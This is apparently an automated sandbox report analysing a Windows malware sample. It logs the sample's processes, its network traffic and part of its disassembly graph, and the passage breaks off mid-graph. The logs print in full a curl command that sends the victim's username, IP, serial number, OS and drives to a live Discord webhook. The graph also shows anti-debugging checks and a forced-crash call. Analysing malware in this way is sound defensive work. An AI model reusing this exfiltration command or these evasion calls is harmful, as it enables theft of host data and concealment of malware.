                                      CF-RAY: 8fa14297390542ca-EWR
                                      server-timing: cfL4;desc="?proto=TCP&rtt=2384&min_rtt=2376&rtt_var=907&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=715&delivery_rate=1196231&cwnd=252&unsent_bytes=0&cid=fc6f3507a35fe69a&ts=134&x=0"
                                      2024-12-30 10:13:57 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                      Data Ascii: 8.46.123.189


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.549717162.159.128.2334433128C:\Windows\System32\curl.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-30 10:13:57 UTC230OUTPOST /api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhm HTTP/1.1
                                      Host: discord.com
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Content-Type: application/json
                                      Content-Length: 483
                                      2024-12-30 10:13:57 UTC483OUTData Raw: 7b 22 65 6d 62 65 64 73 22 3a 5b 7b 22 63 6f 6c 6f 72 22 3a 31 36 37 31 31 36 38 30 2c 22 66 69 65 6c 64 73 22 3a 5b 7b 22 69 6e 6c 69 6e 65 22 3a 66 61 6c 73 65 2c 22 6e 61 6d 65 22 3a 22 6c 6f 63 61 6c 20 75 73 65 72 22 2c 22 76 61 6c 75 65 22 3a 22 61 6c 66 6f 6e 73 22 7d 2c 7b 22 69 6e 6c 69 6e 65 22 3a 66 61 6c 73 65 2c 22 6e 61 6d 65 22 3a 22 73 79 73 74 65 6d 20 6e 61 6d 65 22 2c 22 76 61 6c 75 65 22 3a 22 35 37 31 33 34 35 22 7d 2c 7b 22 69 6e 6c 69 6e 65 22 3a 66 61 6c 73 65 2c 22 6e 61 6d 65 22 3a 22 69 70 20 61 64 64 72 65 73 73 22 2c 22 76 61 6c 75 65 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d 2c 7b 22 69 6e 6c 69 6e 65 22 3a 66 61 6c 73 65 2c 22 6e 61 6d 65 22 3a 22 73 65 72 69 61 6c 20 6e 75 6d 62 65 72 22 2c 22 76 61 6c 75 65 22 3a
                                      Data Ascii: {"embeds":[{"color":16711680,"fields":[{"inline":false,"name":"local user","value":"user"},{"inline":false,"name":"system name","value":"571345"},{"inline":false,"name":"ip address","value":"8.46.123.189"},{"inline":false,"name":"serial number","value":
                                      2024-12-30 10:13:57 UTC1354INHTTP/1.1 204 No Content
                                      Date: Mon, 30 Dec 2024 10:13:57 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Set-Cookie: __dcfduid=c835fb62c69611ef863f966620e4c59f; Expires=Sat, 29-Dec-2029 10:13:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                      x-ratelimit-limit: 5
                                      x-ratelimit-remaining: 4
                                      x-ratelimit-reset: 1735553639
                                      x-ratelimit-reset-after: 1
                                      via: 1.1 google
                                      alt-svc: h3=":443"; ma=86400
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bfFxL5BkqUOdgq4srbTEipjgsj0H9CNzXuLs4XwCz94rbH2hAqKn2nNKW3CeDFXdPrhlaJPwTchSOlR5Y%2Bkjx%2FGndss9g7V%2FCRpdjfLIhr5opgvmFPsDuyCLrTgl"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      X-Content-Type-Options: nosniff
                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                      Set-Cookie: __sdcfduid=c835fb62c69611ef863f966620e4c59f511aac810e3678fd80b198e49d5880759e6e32fb73411edecef8c7f8789f128d; Expires=Sat, 29-Dec-2029 10:13:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                      Set-Cookie: __cfruid=ab78eebfe44a05b76b2400de2d48a71ed5b19135-1735553637; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                      2024-12-30 10:13:57 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 51 4e 37 57 68 61 33 5a 7a 2e 53 43 7a 39 48 33 32 72 65 5a 36 58 6f 52 2e 4b 6a 31 74 4e 55 4e 53 34 69 78 51 6e 36 79 48 76 6f 2d 31 37 33 35 35 35 33 36 33 37 38 32 37 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 61 31 34 32 39 62 33 66 35 33 37 63 39 33 2d 45 57 52 0d 0a 0d 0a
                                      Data Ascii: Set-Cookie: _cfuvid=QN7Wha3Zz.SCz9H32reZ6XoR.Kj1tNUNS4ixQn6yHvo-1735553637827-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8fa1429b3f537c93-EWR


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:05:13:52
                                      Start date:30/12/2024
                                      Path:C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe"
                                      Imagebase:0x7ff670fc0000
                                      File size:290'944 bytes
                                      MD5 hash:E181EB699888D8BBBE0B89D41DF77678
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:1
                                      Start time:05:13:52
                                      Start date:30/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:05:13:52
                                      Start date:30/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org
                                      Imagebase:0x7ff6dc710000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:05:13:52
                                      Start date:30/12/2024
                                      Path:C:\Windows\System32\curl.exe
                                      Wow64 process (32bit):false
                                      Commandline:curl -s https://api.ipify.org
                                      Imagebase:0x7ff6ec190000
                                      File size:530'944 bytes
                                      MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:05:13:53
                                      Start date:30/12/2024
                                      Path:C:\Windows\System32\curl.exe
                                      Wow64 process (32bit):false
                                      Commandline:curl -H "Content-Type: application/json" -X POST -d "{\"embeds\":[{\"color\":16711680,\"fields\":[{\"inline\":false,\"name\":\"local user\",\"value\":\"user\"},{\"inline\":false,\"name\":\"system name\",\"value\":\"571345\"},{\"inline\":false,\"name\":\"ip address\",\"value\":\"8.46.123.189\"},{\"inline\":false,\"name\":\"serial number\",\"value\":\"C6553AFB\"},{\"inline\":false,\"name\":\"product version\",\"value\":\"Windows 6.2 (Build 9200)\"},{\"inline\":false,\"name\":\"Drives\",\"value\":\"C: (Local) D: (CD-ROM)\"}],\"footer\":{\"text\":\"New client\"},\"timestamp\":\"2024-12-30T11:32:25.000Z\"}]}" https://discord.com/api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhm
                                      Imagebase:0x7ff6ec190000
                                      File size:530'944 bytes
                                      MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:6
                                      Start time:05:13:54
                                      Start date:30/12/2024
                                      Path:C:\Users\user\AppData\Local\java.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Users\user\AppData\Local\java.exe
                                      Imagebase:0x7ff65e1f0000
                                      File size:290'944 bytes
                                      MD5 hash:E181EB699888D8BBBE0B89D41DF77678
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 47%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:7
                                      Start time:05:13:55
                                      Start date:30/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:8
                                      Start time:05:13:55
                                      Start date:30/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org
                                      Imagebase:0x7ff6dc710000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:9
                                      Start time:05:13:55
                                      Start date:30/12/2024
                                      Path:C:\Windows\System32\curl.exe
                                      Wow64 process (32bit):false
                                      Commandline:curl -s https://api.ipify.org
                                      Imagebase:0x7ff6ec190000
                                      File size:530'944 bytes
                                      MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:10
                                      Start time:05:13:56
                                      Start date:30/12/2024
                                      Path:C:\Windows\System32\curl.exe
                                      Wow64 process (32bit):false
                                      Commandline:curl -H "Content-Type: application/json" -X POST -d "{\"embeds\":[{\"color\":16711680,\"fields\":[{\"inline\":false,\"name\":\"local user\",\"value\":\"user\"},{\"inline\":false,\"name\":\"system name\",\"value\":\"571345\"},{\"inline\":false,\"name\":\"ip address\",\"value\":\"8.46.123.189\"},{\"inline\":false,\"name\":\"serial number\",\"value\":\"C6553AFB\"},{\"inline\":false,\"name\":\"product version\",\"value\":\"Windows 6.2 (Build 9200)\"},{\"inline\":false,\"name\":\"Drives\",\"value\":\"C: (Local) D: (CD-ROM)\"}],\"footer\":{\"text\":\"New client\"},\"timestamp\":\"2024-12-30T11:32:27.000Z\"}]}" https://discord.com/api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhm
                                      Imagebase:0x7ff6ec190000
                                      File size:530'944 bytes
                                      MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:23.5%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:29.6%
                                        Total number of Nodes:1725
                                        Total number of Limit Nodes:15
                                        execution_graph 5939 7ff670fc2c40 5940 7ff670fc20b0 _Receive_impl 2 API calls 5939->5940 5941 7ff670fc2c54 5940->5941 5942 7ff670fc2c66 5941->5942 5943 7ff670fcda34 _Receive_impl free 5941->5943 5943->5942 6200 7ff670fcad45 6201 7ff670fcd9f0 4 API calls 6200->6201 6202 7ff670fcad57 6201->6202 6203 7ff670fcada4 6202->6203 6204 7ff670fcc8d0 7 API calls 6202->6204 6206 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 6203->6206 6205 7ff670fcad84 memmove 6204->6205 6205->6203 6207 7ff670fcadc8 6206->6207 6325 7ff670fcd5c0 6326 7ff670fcd5cf 6325->6326 6328 7ff670fcd5e1 6325->6328 6327 7ff670fcc470 20 API calls 6326->6327 6327->6328 6329 7ff670fc9fc0 6330 7ff670fcd9f0 4 API calls 6329->6330 6331 7ff670fc9fca 6330->6331 6208 7ff670fcb341 6209 7ff670fcb346 ?uncaught_exceptions@std@ 6208->6209 6210 7ff670fcb350 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 6209->6210 6211 7ff670fcb35a 6209->6211 6210->6211 6212 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 6211->6212 6213 7ff670fcb385 6212->6213 6214 7ff670fceb37 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA 6215 7ff670fcdb38 6216 7ff670fcdb48 6215->6216 6228 7ff670fcde24 6216->6228 6218 7ff670fce324 9 API calls 6219 7ff670fcdbed 6218->6219 6220 7ff670fcdb6c _RTC_Initialize 6226 7ff670fcdbcf 6220->6226 6236 7ff670fce2c8 InitializeSListHead 6220->6236 6226->6218 6227 7ff670fcdbdd 6226->6227 6229 7ff670fcde35 6228->6229 6230 7ff670fcde67 6228->6230 6231 7ff670fcdea4 6229->6231 6234 7ff670fcde3a __scrt_release_startup_lock 6229->6234 6230->6220 6232 7ff670fce324 9 API calls 6231->6232 6233 7ff670fcdeae 6232->6233 6234->6230 6235 7ff670fcde57 _initialize_onexit_table 6234->6235 6235->6230 6126 7ff670fc10d0 __std_exception_destroy 6237 7ff670fc4750 6238 7ff670fc4765 6237->6238 6239 7ff670fc47ac 6237->6239 6238->6239 6240 7ff670fc4789 6238->6240 6241 7ff670fc477c SysFreeString 6238->6241 6242 7ff670fcda34 _Receive_impl free 6240->6242 6244 7ff670fc4797 6240->6244 6241->6240 6242->6244 6243 7ff670fcda34 _Receive_impl free 6243->6239 6244->6243 6332 7ff670fce9d4 6333 7ff670fcea0c __GSHandlerCheckCommon 6332->6333 6334 7ff670fcea27 __CxxFrameHandler4 6333->6334 6335 7ff670fcea38 6333->6335 6334->6335 5948 7ff670fcfa4f _seh_filter_exe 6336 7ff670fcebd0 6337 7ff670fcda34 _Receive_impl free 6336->6337 6338 7ff670fcebe7 6337->6338 4488 7ff670fc3ec9 CreateToolhelp32Snapshot 4489 7ff670fc3ef7 4488->4489 4490 7ff670fc3f06 memset Process32FirstW 4488->4490 4495 7ff670fc4530 9 API calls 4489->4495 4498 7ff670fc3eb0 4489->4498 4491 7ff670fc3f74 CloseHandle 4490->4491 4492 7ff670fc3f32 4490->4492 4491->4489 4493 7ff670fc3f40 _wcsicmp 4492->4493 4497 7ff670fc3f5e Process32NextW 4492->4497 4493->4492 4494 7ff670fc3f6f 4493->4494 4494->4491 4496 7ff670fc427e ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 4495->4496 4496->4498 4497->4492 4497->4494 4499 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 4498->4499 4500 7ff670fc423d 4499->4500 6245 7ff670fcdd4a 6246 7ff670fce474 GetModuleHandleW 6245->6246 6247 7ff670fcdd51 6246->6247 6248 7ff670fcdd55 6247->6248 6249 7ff670fcdd90 _exit 6247->6249 6339 7ff670fc97cd 6340 7ff670fc97f8 6339->6340 6345 7ff670fc97e3 6339->6345 6341 7ff670fc9893 6340->6341 6342 7ff670fc9870 memset 6340->6342 6340->6345 6344 7ff670fc3710 10 API calls 6341->6344 6342->6345 6344->6345 5949 7ff670fcac49 5950 7ff670fcd9f0 4 API calls 5949->5950 5951 7ff670fcac5b 5950->5951 5952 7ff670fcacd1 5951->5952 5953 7ff670fcd610 6 API calls 5951->5953 5954 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 5952->5954 5957 7ff670fcac8f 5953->5957 5955 7ff670fcadc8 5954->5955 5956 7ff670fcab10 8 API calls 5956->5957 5957->5952 5957->5956 5958 7ff670fcf864 ??1_Lockit@std@@QEAA 5959 7ff670fc9a5f 5960 7ff670fc9a72 5959->5960 5962 7ff670fc9ab1 5959->5962 5960->5962 5963 7ff670fca140 5960->5963 5964 7ff670fca164 5963->5964 5965 7ff670fca14d 5963->5965 5966 7ff670fca17e memset 5964->5966 5967 7ff670fca1b7 5964->5967 5965->5962 5966->5962 5969 7ff670fc3710 10 API calls 5967->5969 5970 7ff670fca1c7 5969->5970 5970->5962 6127 7ff670fceae0 6128 7ff670fceaf3 6127->6128 6129 7ff670fceb00 6127->6129 6130 7ff670fc29a0 std::locale::global 2 API calls 6128->6130 6130->6129 6131 7ff670fcd8e0 6132 7ff670fcd8fc 6131->6132 6133 7ff670fcd912 LocalFree 6132->6133 6134 7ff670fcd91e 6132->6134 6133->6134 6253 7ff670fccf60 6254 7ff670fccf76 6253->6254 6255 7ff670fccf87 6253->6255 6254->6255 6256 7ff670fc7080 20 API calls 6254->6256 6256->6254 6346 7ff670fca1e0 6349 7ff670fc92a0 __std_exception_copy __std_exception_copy 6346->6349 6348 7ff670fca1ee 6349->6348 6135 7ff670fcacda 6136 7ff670fcd9f0 4 API calls 6135->6136 6137 7ff670fcacec 6136->6137 6138 7ff670fc2a40 13 API calls 6137->6138 6139 7ff670fcad06 6138->6139 6140 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 6139->6140 6141 7ff670fcadc8 6140->6141 5971 7ff670fc2670 5973 7ff670fc2698 5971->5973 5982 7ff670fc269d 5971->5982 5972 7ff670fc2757 5974 7ff670fcd9f0 4 API calls 5972->5974 5973->5972 5975 7ff670fc2726 5973->5975 5976 7ff670fc270b 5973->5976 5978 7ff670fc2719 5973->5978 5973->5982 5974->5976 5980 7ff670fcd9f0 4 API calls 5975->5980 5975->5982 5977 7ff670fc2770 memmove 5976->5977 5983 7ff670fc283e _invalid_parameter_noinfo_noreturn 5976->5983 5986 7ff670fc27ab 5977->5986 5978->5975 5979 7ff670fc2863 5978->5979 5981 7ff670fc1120 Concurrency::cancel_current_task __std_exception_copy 5979->5981 5980->5976 5984 7ff670fc2868 5981->5984 5983->5982 5985 7ff670fc2810 5987 7ff670fcda34 _Receive_impl free 5985->5987 5986->5982 5986->5983 5986->5985 5987->5982 6260 7ff670fc5570 6261 7ff670fc55a0 6260->6261 6261->6261 6262 7ff670fcc990 8 API calls 6261->6262 6263 7ff670fc55da 6262->6263 6264 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 6263->6264 6265 7ff670fc55ea 6264->6265 6266 7ff670fcab6f 6267 7ff670fcd9f0 4 API calls 6266->6267 6268 7ff670fcab81 6267->6268 6269 7ff670fcd9f0 4 API calls 6268->6269 6270 7ff670fcabab 6269->6270 6275 7ff670fcd6a0 6270->6275 6272 7ff670fcabd1 6272->6272 6273 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 6272->6273 6274 7ff670fcadc8 6273->6274 6276 7ff670fcd761 6275->6276 6277 7ff670fcd6cc 6275->6277 6276->6272 6278 7ff670fcd9f0 4 API calls 6277->6278 6279 7ff670fcd6e4 6278->6279 6280 7ff670fc2a40 13 API calls 6279->6280 6281 7ff670fcd701 6280->6281 6282 7ff670fcab10 8 API calls 6281->6282 6283 7ff670fcd70f 6282->6283 6284 7ff670fcd6a0 21 API calls 6283->6284 6284->6276 5988 7ff670fcee70 5989 7ff670fcee83 5988->5989 5990 7ff670fcee90 5988->5990 5992 7ff670fc29a0 5989->5992 5993 7ff670fc29df 5992->5993 5994 7ff670fc29b3 5992->5994 5993->5990 5995 7ff670fc29d7 5994->5995 5996 7ff670fc29f8 _invalid_parameter_noinfo_noreturn 5994->5996 5997 7ff670fcda34 _Receive_impl free 5995->5997 5997->5993 6289 7ff670fc9370 6290 7ff670fc9386 6289->6290 6294 7ff670fc93b6 6289->6294 6291 7ff670fc93ae 6290->6291 6292 7ff670fc9418 _invalid_parameter_noinfo_noreturn 6290->6292 6293 7ff670fcda34 _Receive_impl free 6291->6293 6293->6294 6354 7ff670fcc5f0 6355 7ff670fcc5fc 6354->6355 6360 7ff670fc9ea0 6354->6360 6356 7ff670fc9f33 6357 7ff670fc9ed8 6359 7ff670fc9f28 6357->6359 6361 7ff670fc9f4b _invalid_parameter_noinfo_noreturn 6357->6361 6358 7ff670fc83e0 23 API calls 6358->6360 6362 7ff670fcda34 _Receive_impl free 6359->6362 6360->6356 6360->6357 6360->6358 6363 7ff670fca640 20 API calls 6361->6363 6362->6356 6364 7ff670fc9f70 6363->6364 6365 7ff670fcf9f0 6366 7ff670fcfa25 __current_exception __current_exception_context terminate 6365->6366 6367 7ff670fcfa19 6365->6367 6366->6367 6368 7ff670fc9fe6 6369 7ff670fcbc80 16 API calls 6368->6369 6370 7ff670fc9feb 6369->6370 5929 7ff670fc3fea LoadLibraryA 5930 7ff670fc4020 5929->5930 5931 7ff670fc3fff GetProcAddress 5929->5931 5934 7ff670fc4530 9 API calls 5930->5934 5936 7ff670fc3eb0 5930->5936 5932 7ff670fc402f GetCurrentProcess NtQueryInformationProcess FreeLibrary 5931->5932 5933 7ff670fc4017 FreeLibrary 5931->5933 5932->5930 5933->5930 5935 7ff670fc427e ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5934->5935 5935->5936 5937 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 5936->5937 5938 7ff670fc423d 5937->5938 5998 7ff670fc9469 5999 7ff670fc948f 5998->5999 6001 7ff670fc947a 5998->6001 6000 7ff670fca140 11 API calls 5999->6000 5999->6001 6000->6001 6002 7ff670fc1080 __std_exception_destroy 6003 7ff670fc10b5 6002->6003 6004 7ff670fc10a8 6002->6004 6005 7ff670fcda34 _Receive_impl free 6004->6005 6005->6003 6006 7ff670fc2c80 6007 7ff670fc2870 _Receive_impl 4 API calls 6006->6007 6008 7ff670fc2c94 6007->6008 6009 7ff670fc2ca6 6008->6009 6010 7ff670fcda34 _Receive_impl free 6008->6010 6010->6009 6374 7ff670fc1c00 6375 7ff670fc2870 _Receive_impl 4 API calls 6374->6375 6376 7ff670fc1c42 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 6375->6376 6377 7ff670fc2c00 ??1?$codecvt@_WDU_Mbstatet@@@std@@MEAA 6378 7ff670fc2c31 6377->6378 6379 7ff670fc2c24 6377->6379 6380 7ff670fcda34 _Receive_impl free 6379->6380 6380->6378 6011 7ff670fcf47e 6012 7ff670fc4530 9 API calls 6011->6012 6013 7ff670fcf49f 6012->6013 6014 7ff670fc4530 9 API calls 6013->6014 6015 7ff670fcf4ba ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6014->6015 6142 7ff670fc9cff 6143 7ff670fc9d7d _dsign 6142->6143 6145 7ff670fc9d25 6142->6145 6144 7ff670fc9d91 6143->6144 6144->6145 6147 7ff670fc5e40 6144->6147 6148 7ff670fc5e98 6147->6148 6149 7ff670fc5e5b 6147->6149 6150 7ff670fc5ed1 6148->6150 6151 7ff670fc5ea1 6148->6151 6149->6148 6152 7ff670fc5e60 memset 6149->6152 6153 7ff670fc5f16 6150->6153 6155 7ff670fc5ed6 memmove memset 6150->6155 6151->6153 6154 7ff670fc5ea6 memmove 6151->6154 6152->6145 6156 7ff670fc5f1f memmove 6153->6156 6157 7ff670fc5f3c 6153->6157 6154->6157 6155->6157 6156->6157 6157->6145 6158 7ff670fcc300 6159 7ff670fcc350 6158->6159 6160 7ff670fcc34b 6158->6160 6162 7ff670fc3200 13 API calls 6159->6162 6161 7ff670fcb6a0 9 API calls 6160->6161 6161->6159 6163 7ff670fcc369 6162->6163 6164 7ff670fc3200 13 API calls 6163->6164 6165 7ff670fcc382 6164->6165 6381 7ff670fcd600 6382 7ff670fcd60c 6381->6382 6384 7ff670fcaee0 6381->6384 6383 7ff670fcaf4d 6384->6383 6385 7ff670fcaf48 6384->6385 6386 7ff670fcaf65 _invalid_parameter_noinfo_noreturn 6384->6386 6387 7ff670fcda34 _Receive_impl free 6385->6387 6387->6383 6388 7ff670fcae00 6389 7ff670fc34a0 8 API calls 6388->6389 6390 7ff670fcae32 6389->6390 6391 7ff670fcdc00 6395 7ff670fce4c8 SetUnhandledExceptionFilter 6391->6395 4481 7ff670fc4082 GetCurrentProcess CheckRemoteDebuggerPresent 4482 7ff670fc41e1 4481->4482 4483 7ff670fc4530 9 API calls 4482->4483 4485 7ff670fc3eb0 4482->4485 4484 7ff670fc427e ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 4483->4484 4484->4485 4486 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 4485->4486 4487 7ff670fc423d 4486->4487 4440 7ff670fc4710 ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 6017 7ff670fc1c90 6020 7ff670fc1ccb 6017->6020 6018 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 6019 7ff670fc1dea 6018->6019 6020->6018 6166 7ff670fc5910 __std_exception_destroy __std_exception_destroy 6167 7ff670fc5510 6170 7ff670fc1010 6167->6170 6169 7ff670fc5535 __stdio_common_vsprintf 6170->6169 6175 7ff670fcd510 6176 7ff670fcd51e 6175->6176 6177 7ff670fcd528 6175->6177 6178 7ff670fcda34 _Receive_impl free 6176->6178 6178->6177 6300 7ff670fcd990 6303 7ff670fcd890 6300->6303 6304 7ff670fcd8b7 _CxxThrowException 6303->6304 4501 7ff670fc3f89 QueryPerformanceFrequency QueryPerformanceCounter SleepEx QueryPerformanceCounter 4502 7ff670fc41e1 4501->4502 4503 7ff670fc4530 9 API calls 4502->4503 4505 7ff670fc3eb0 4502->4505 4504 7ff670fc427e ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 4503->4504 4504->4505 4506 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 4505->4506 4507 7ff670fc423d 4506->4507 6179 7ff670fceb06 6180 7ff670fceb31 6179->6180 6181 7ff670fceb19 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 6179->6181 6181->6180 6029 7ff670fcfa88 6031 7ff670fcfa90 6029->6031 6030 7ff670fcfad9 6031->6030 6032 7ff670fcfac4 free 6031->6032 6032->6031 6403 7ff670fc1020 __std_exception_copy 6308 7ff670fccfa0 6309 7ff670fccfb6 6308->6309 6310 7ff670fccfc7 6308->6310 6309->6310 6311 7ff670fc83e0 23 API calls 6309->6311 6311->6309 6404 7ff670fcc220 6405 7ff670fcc27e 6404->6405 6406 7ff670fcc279 6404->6406 6408 7ff670fc3200 13 API calls 6405->6408 6407 7ff670fcb6a0 9 API calls 6406->6407 6407->6405 6409 7ff670fcc297 6408->6409 6410 7ff670fc3200 13 API calls 6409->6410 6411 7ff670fcc2b0 6410->6411 6412 7ff670fc3200 13 API calls 6411->6412 6413 7ff670fcc2c5 6412->6413 6414 7ff670fc3200 13 API calls 6413->6414 6415 7ff670fcc2de 6414->6415 4508 7ff670fcdc1c 4509 7ff670fcdc35 4508->4509 4510 7ff670fcdd73 4509->4510 4511 7ff670fcdc3d __scrt_acquire_startup_lock 4509->4511 4555 7ff670fce324 IsProcessorFeaturePresent 4510->4555 4513 7ff670fcdd7d 4511->4513 4518 7ff670fcdc5b __scrt_release_startup_lock 4511->4518 4514 7ff670fce324 9 API calls 4513->4514 4515 7ff670fcdd88 4514->4515 4517 7ff670fcdd90 _exit 4515->4517 4516 7ff670fcdc80 4518->4516 4519 7ff670fcdd06 _get_initial_narrow_environment __p___argv __p___argc 4518->4519 4522 7ff670fcdcfe _register_thread_local_exe_atexit_callback 4518->4522 4528 7ff670fc42b0 4519->4528 4522->4519 4525 7ff670fcdd33 4526 7ff670fcdd3d 4525->4526 4527 7ff670fcdd38 _cexit 4525->4527 4526->4516 4527->4526 4561 7ff670fc3e00 4528->4561 4531 7ff670fc4320 GetConsoleWindow ShowWindow SetConsoleCtrlHandler 4533 7ff670fc44de 4531->4533 4534 7ff670fc4346 GetConsoleWindow GetSystemMenu 4531->4534 4532 7ff670fc42e6 RtlAdjustPrivilege NtRaiseHardError 4532->4531 4535 